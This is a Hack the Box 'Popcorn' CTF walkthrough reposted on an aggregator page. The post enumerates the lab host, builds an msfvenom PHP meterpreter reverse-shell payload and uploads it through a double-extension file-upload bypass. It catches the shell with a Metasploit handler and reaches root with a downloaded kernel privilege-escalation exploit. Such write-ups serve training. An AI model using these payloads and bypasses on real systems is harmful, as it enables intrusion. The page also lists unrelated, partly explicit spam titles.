Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1867

Hack the Box Challenge: Popcorn Walkthrough

March 28, 2018, 7:45 am
$
0
0

Hello friends!! Today we are going to solve another CTF challenge “Popcorn” which is available online for those who want to increase their skill in penetration testing and black box testing. popcorn is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txtand root.txtfile in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.6 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.6
From given below image, you can observe we found port 22,80 are open in victim’s network.



Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue for the next step.



Next we have used dirb tool of kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6 . After checking most of the directories, we finally decided to go for /torrent directory.



So next we decided to explore http://10.10.10.6/torrent/through browser URL and what we see is a Webpage shown below. After looking at the page for some clue, we saw that we need to register on this site first.



After clicking on Register option on the Webpage. The registration form opened is shown below. As you can see you need give details to successfully register on this site.



After successfully registering on the website. Click on Uploadoption and the page opened is shown below. Now here we have given the path of any torrentfile. Then Click on upload.



When the torrent file is successfully uploaded the next page we are redirected to is shown below. Now simply click on Edit this torrent option.



Now using metasploit we have created a payload in php by using command msfvenom –p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 –f raw .



Now the problem we got was while we are uploading a php file in the update screenshot option it was not taking a phpfile. So what we did here is renamed the file with php.png which is 123.php.png . And Clicked on Submit Screenshot.



But before clicking on submit screenshot we have captured the request of this page using Burp Suite. Where you can see our file with double extension has been successfully submitted.



As you can see have edited the file name to 123.php.Now Click on Forward option in burp suite.



Next we saw that our file has been successfully uploaded.



Next we have again used dirb tool of kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6/torrent/ . After checking most of the directories, we finally decided to go for /torrent/upload/ directory.



So next we decided to explore http://10.10.10.6/torrent/upload/through browser URL and what we see is a Webpage shown below. We see that our file has been successfully uploaded. By click on the file we have uploaded.



We have used metasploit’s and got the meterpreter as you can see below.
msf use exploit/multi/handler
msfexploit(multi/handler) set payload php/meterpreter/reverse_tcp
msfexploit(multi/handler) set lhost 10.10.14.3
msfexploit(multi/handler) set lport 4321
msfexploit(multi/handler) exploit
Once we have got the meterpreter. We have used command cd /home. Than we check inside the george directory using command ls /home/george, here we found out the user.txt file and read the file content which contains our first FLAG!!



Now have searched kernel explit on google , where we found that it is an exploit which is used for getting Local privilege escalation. We have simply downloaded the file on our Desktop.


As you can see we have uploaded using the command upload /root/Desktop/15704.c Now we have used command shell to access the root privilege. Now we have compiled. Next we have given permission to the exploit. Using cd /root command we have found root.txtfile. And to view the contents we have used cat root.txt command. In the end we have found our Final FLAG!!



Search
Viewing all articles
Browse latest Browse all 1867

Trending Articles

RAMAYAMPET Mandal Sarpanch | Upa-Sarpanch | Ward member Mobile Numbers Medak...

May 24, 2017, 2:00 am

लड़कियां सेक्स के दौरान क्यों करती है उह! आह!लड़कियां सेक्स के दौरान क्यों करती...

May 19, 2016, 1:54 am

Neem Baba Extra Questions Answer Class 6 English Poorvi

February 1, 2025, 5:19 am

Throw Back: 4×4 — Sikilitele (Ft Castro) Prod by JQ

March 5, 2015, 8:24 am

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

August 20, 2016, 5:13 pm

Lowe faces four theft charges

November 14, 2017, 6:52 pm

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Mafia, Murder & Mayhem In The Motor City: Detroit Mob Hit Timeline (1937-2007)

December 7, 2016, 3:57 pm

The 10 Tennessee Cities With The Largest Black Population For 2021

December 21, 2020, 10:12 am

Materials Around Us Class 6 Worksheet Science Chapter 6

October 3, 2024, 5:20 am

デスクトップ ヒープの枯渇

January 18, 2018, 8:31 pm

Best Suvichar in Hindi |बेस्ट सुविचार |शुभ विचार हिंदी में

March 7, 2020, 11:19 pm

Kanulanu Thaake Lyrics and translation | Manam (2014)

May 9, 2014, 5:45 am

Korean Sex Porn Videos: XXX Videos & Free Porn Movies

May 30, 2025, 9:29 pm

Teen Shot In Miami Drive-By Dies From Injuries

August 8, 2011, 1:16 pm

Download: IQ Muzatasha feat Shy D & Pmj – Ulesi NiFertilizer Yamavuto

March 22, 2018, 7:23 pm

Mahakal Attitude Status

February 29, 2020, 9:52 am

Property developer set up cannabis factory to help pay off debts...

August 3, 2015, 2:29 am

July 11, 2015, 6:15 am

KB: How to troubleshoot issues when adding a Hyper-V host in System Center...

August 14, 2012, 10:05 am
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>